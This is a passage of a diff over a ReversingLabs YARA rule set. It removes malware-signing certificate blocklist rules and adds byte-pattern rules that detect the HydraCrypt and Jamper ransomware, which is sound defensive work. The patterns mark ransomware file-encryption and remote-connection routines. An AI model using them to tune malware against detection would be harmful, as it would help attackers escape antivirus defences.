+            89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 50 FF
+            B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 68
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 3B C6 0F 8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 89 B5 ?? ?? ?? ?? 0F 84 ??
+            ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 56 E8 ?? ??
+            ?? ?? 59 50 56 8D B5 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B C8 85 C9
+            89 8D ?? ?? ?? ?? 7D ?? C6 07 ?? 51 E9 ?? ?? ?? ?? 83 F9 ?? 0F 8C ?? ?? ?? ?? 83 BD
+            ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? 33 C0 8D BD ?? ?? ?? ?? 66
+            AB 40 3B C8 89 85 ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? 8D 47 ?? E8 ?? ?? ?? ?? 85 C0 59 59 0F 85 ?? ?? ?? ?? 8B 77 ?? 2B 37
+            8D 46 ?? 50 E8 ?? ?? ?? ?? 59 56 6A ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 07 8B
+            8D ?? ?? ?? ?? 83 C4 ?? 03 C8 51 8B 4F ?? 2B C8 51 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 59 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 59 40 50 E8
+            ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? 8B F0 6A ?? 56 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? FF B5 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 56 53 C6 04 06 ??
+            E8 ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? 50 56 8D B5 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6
+            3B C6 59 59 0F 8C ?? ?? ?? ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85
+            ?? ?? ?? ?? 83 F8 ?? 7E ?? 48 8D B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 85 C0 59 59 75 ?? 8B 06 8B 8D ?? ?? ?? ?? 03
+            C8 51 8B 4E ?? 2B C8 51 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            83 C6 ?? FF 8D ?? ?? ?? ?? 75 ?? 33 F6 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 39 B5 ??
+            ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF 85 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 83 C7 ?? 3B 85 ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 85 C0 59 59 0F 85 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 59 59 B0 ?? E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 50 53 C6
+            01 ?? E8 ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 59 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            59 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 74
+            ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 53 C6 00 ?? E8 ?? ?? ??
+            ?? EB ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C6 00 ?? EB ?? 0F
+            84 ?? ?? ?? ?? C6 07 ?? FF 15 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 59 59 83 BD ?? ?? ??
+            ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 32 C0 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\"VERY EXCLUSIVE LTD\"" and pe.signatures [ i ] . serial == "48:42:af:ad:00:90:4e:d8:c9:88:11:e6:52:cc:b3:b7" and 1545177600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $search_and_encrypt_files and $remote_connection_1 and $remote_connection_2
 }
-
-rule REVERSINGLABS_Cert_Blocklist_5A59A686B4A904D0Fca07153Ea6Db6Cc : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Hydracrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects HydraCrypt ransomware."
 		author = "ReversingLabs"
-		id = "018e511f-191d-5fd4-8ab0-0e5bbff44d58"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "2e780f7c-8d6d-51c8-b65e-330cc3b17bb7"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3306-L3322"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7597b2ba870ec58ac0786a97fb92956406fe019c81f6176cc1a581988d3a9632"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.HydraCrypt.yara#L1-L174"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "910a6f23f06cecb8d3115ebfed42a66412dbd0d3a519e39f21df81b0c2028f48"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HydraCrypt"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABADAN PIZZA LTD" and pe.signatures [ i ] . serial == "5a:59:a6:86:b4:a9:04:d0:fc:a0:71:53:ea:6d:b6:cc" and 1563403380 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0B6D8152F4A06Ba781C6677Eea5Ab74B : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "dacac5fe-00dc-5080-a725-9ef69473c45e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3324-L3340"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bd20cf8e4cab2117361dbe05ae2efe813e7f55667b1f3825cd893313d98dcb5f"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$remote_connection_1 = {
+            55 8B EC 83 EC ?? 53 56 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 BE ?? ?? ?? ?? 56
+            33 DB 53 53 6A ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ??
+            59 59 53 53 6A ?? 53 53 6A ?? FF 75 ?? FF 75 ?? FF D0 89 45 ?? 3B C3 0F 84 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 56 53 53 68 ?? ?? ?? ?? FF 75 ?? 68
+            ?? ?? ?? ?? FF 75 ?? FF D0 89 45 ?? 3B C3 0F 84 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ??
+            E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 6A ?? FF D0 8B F0 68 ?? ?? ?? ?? 56 E8 ?? ?? ??
+            ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? 56 E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
+            BF ?? ?? ?? ?? 57 89 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 56 50 57 FF 75 ?? E8 ?? ?? ?? ??
+            83 C4 ?? 5F 39 5D ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 39 5D ?? 74 ?? FF 75 ?? E8 ??
+            ?? ?? ?? 59 39 5D ?? 5E 5B 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 C9 C3
+        }
+		$remote_connection_2 = {
+            55 8B EC 83 EC ?? 53 56 57 6A ?? 59 68 ?? ?? ?? ?? 33 DB BE ?? ?? ?? ?? 8D 7D ?? 6A
+            ?? 89 5D ?? F3 A5 E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 53 53 53 8D 4D ?? 51 FF D0 8B
+            F8 3B FB 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 68
+            ?? ?? ?? ?? 53 53 FF 75 ?? 57 FF D0 8B F0 3B F3 75 ?? 53 E8 ?? ?? ?? ?? 59 EB ?? 68
+            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 6A ?? 8D 4D ?? 51 FF D0 68 ?? ?? ?? ?? 6A ??
+            E8 ?? ?? ?? ?? 59 59 8D 4D ?? 51 6A ?? 8D 4D ?? 51 56 FF D0 39 5D ?? 75 ?? 57 E8 ??
+            ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 40 EB ?? 68 ?? ??
+            ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 4D ?? 51 FF D0 33 C9 3B C8 1B C0
+            F7 D8 5F 5E 5B C9 C3
+        }
+		$remote_connection_3 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 33 DB 66 A5 53 8D
+            45 ?? 53 50 A4 E8 ?? ?? ?? ?? 59 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? 56 53 FF D0 56
+            50 89 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? FF D0 BF ?? ?? ?? ?? 57 50 89 45 ?? E8 ?? ?? ??
+            ?? 59 59 85 DB 7E ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 8B C3 6A ?? 99 59
+            F7 F9 85 D2 75 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 6A ??
+            E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 8B 45 ?? 0F B6 04 03
+            50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 43 3B DE 7C ?? E8 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ?? 50 56 8D 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 83 C4 ?? 83 7D ?? ?? BB ?? ?? ?? ?? BE ?? ?? ??
+            ?? 75 ?? 53 56 57 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ??
+            75 ?? 53 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F
+            5E 5B C9 C3
+        }
+		$encrypt_files_1 = {
+            8A 45 ?? 04 ?? 66 98 66 89 45 ?? 0F B7 C0 50 8D 45 ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 68
+            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 FF D0 8B F0 83 FE ?? 74 ?? 83
+            FE ?? 74 ?? 83 FE ?? 75 ?? FF 75 ?? 8D 45 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 83 FE ?? 74 ?? 83 FE ?? 75 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 57 6A ?? E8 ?? ?? ??
+            ?? 59 59 68 ?? ?? ?? ?? FF D0 FF 45 ?? 83 7D ?? ?? 0F 8C ?? ?? ?? ?? 83 3D ?? ?? ??
+            ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 BE
+            ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 8D 8D ?? ?? ?? ?? 51 53 FF D0 8D 85
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8
+            ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ??
+            75 ?? E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 FF D0 56 6A
+            ?? E8 ?? ?? ?? ?? 59 59 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 8D 85 ?? ?? ?? ?? 50
+            8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 6A ?? 53 53 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 53 FF D0 57 6A ?? E8 ?? ?? ??
+            ?? 59 59 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 FF D0 5F
+            5E 33 C0 5B C9 C2
+        }
+		$encrypt_files_2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 33 DB 66 A5 53 8D
+            45 ?? 53 50 A4 E8 ?? ?? ?? ?? 59 50 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 A5 89
+            45 ?? 8D 45 ?? 50 66 A5 E8 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 FF D0 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 66 A5 BE
+            ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 53 89 45 ?? 8D 45 ?? 53 50 66 A5 E8 ?? ?? ?? ?? 59 50
+            E8 ?? ?? ?? ?? 8B F0 8D 45 ?? 50 E8 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 BF ??
+            ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 55 ?? 68 ??
+            ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? 51 FF D0 68 ?? ?? ?? ??
+            6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 53 53 FF D0 8B F0 53 56 E8 ?? ?? ?? ?? 59
+            59 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 FF
+            D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
+        }
+		$encrypt_files_3 = {
+            D0 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 85 C0 75 ?? BE ?? ?? ??
+            ?? EB ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? FF D0 56 E8 ?? ??
+            ?? ?? 59 3C ?? 75 ?? BE ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF D0 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D0
+            E8 ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
+            D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
+            D0 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 68 ?? ?? ?? ?? 57 8D 85 ?? ??
+            ?? ?? 50 BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 FF 55 ?? 68 ?? ?? ?? ?? 57 8D 85 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 56 50 FF 55 ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 68 ?? ?? ??
+            ?? 6A ?? 66 A5 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF D0 6A ?? FF 75 ?? A3 ?? ?? ?? ?? FF 55
+            ?? 6A ?? FF 75 ?? 8B F0 FF 55 ?? FF 75 ?? 89 45 ?? 53 E8 ?? ?? ?? ?? 8D 45 ?? 50 FF
+        }
+		$encrypt_files_4 = {
+            35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 66 85 C0 75 ?? 33 C0 40 E9 ?? ?? ?? ?? 8B 3D
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 8B C8 8B 45 ?? 53 57 99 53 53
+            2B C2 68 ?? ?? ?? ?? D1 F8 2D ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B C6 99 2B C2 D1 F8 2D
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 53 FF D1 A3 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 51 FF D0 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0
+            BE ?? ?? ?? ?? 85 C0 75 ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 53 68 ?? ?? ?? ?? 53
+            53 FF D0 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 53 68 ?? ?? ?? ?? 53 53 FF D0 39 1D ??
+            ?? ?? ?? 75 ?? 6A ?? 58 EB ?? 6A ?? 59 33 C0 68 ?? ?? ?? ?? 89 5D ?? 8D 7D ?? 6A ??
+            F3 AB E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 EB ?? 83 F8 ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? E8
+            ?? ?? ?? ?? 59 59 8D 4D ?? 51 FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 8D 4D
+            ?? 51 FF D0 6A ?? 59 8D 75 ?? BF ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ??
+            ?? 59 59 53 53 53 8D 4D ?? 51 FF D0 3B C3 75 ?? 8B 45 ?? 5F 5E 5B C9 C2 ?? ?? 6A ??
+            E9
+        }
+		$remote_connection_4 = {
+            55 8B EC 51 51 53 56 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 33 F6 56 56 56 6A ??
+            68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? 8B D8 E8 ?? ?? ?? ?? 59 59 56 56 6A ?? 56
+            56 6A ?? FF 75 ?? 53 FF D0 68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 59 59 56 68
+            ?? ?? ?? ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? FF D0 68 ?? ?? ??
+            ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 59 59 56 56 56 56 FF 75 ?? FF D0 53 E8 ?? ?? ?? ??
+            FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 5E 5B C9 C3
+        }
+		$remote_connection_5 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 33 FF 68 ?? ?? ?? ?? 47 57 E8 ?? ?? ?? ?? 59 59
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? BE ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51
+            FF D0 56 57 E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 56 57 E8
+            ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 68 ?? ?? ?? ?? 6A ?? E8
+            ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? 51 6A ?? FF D0 BE ?? ?? ?? ?? 85 C0 74 ?? 56 57
+            E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 6A ?? 57
+            6A ?? FF D0 8B D8 85 DB 7D ?? 56 57 E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 59 6A ?? 8D 4D ??
+            51 FF D0 6A ?? 58 66 89 45 ?? 8B 46 ?? 8B 00 8B 00 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 66
+            89 45 ?? 6A ?? 8D 45 ?? 50 53 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 8D ?? ?? ?? ?? 51 FF D0 6A ?? 50 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 53 E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? FF D0 5F 5E 5B C9 C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GLARYSOFT LTD" and pe.signatures [ i ] . serial == "0b:6d:81:52:f4:a0:6b:a7:81:c6:67:7e:ea:5a:b7:4b" and 1568246400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $encrypt_files_1 and $remote_connection_1 and $remote_connection_2 and $remote_connection_3 ) or ( $encrypt_files_2 and $encrypt_files_3 and $encrypt_files_4 and $remote_connection_4 and $remote_connection_5 ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3Ad60Cea73E1Dd1A3E6C02D9B339C380 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Jamper : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Jamper ransomware."
 		author = "ReversingLabs"
-		id = "80b39632-29a7-5932-a47b-736a9e8ed686"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "9ba9358e-8f67-5d0e-a9bc-b3b10cd3a8b2"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3342-L3358"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fb83cf25be19e7cccd2c8369c3a37a90af72cb2f76db3619b8311d2a851335a8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Jamper.yara#L1-L110"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "826f8fa7cc92b279c609a9ab6a87c32940e37b4c2476854af75bbed29cb3eaf2"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Jamper"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
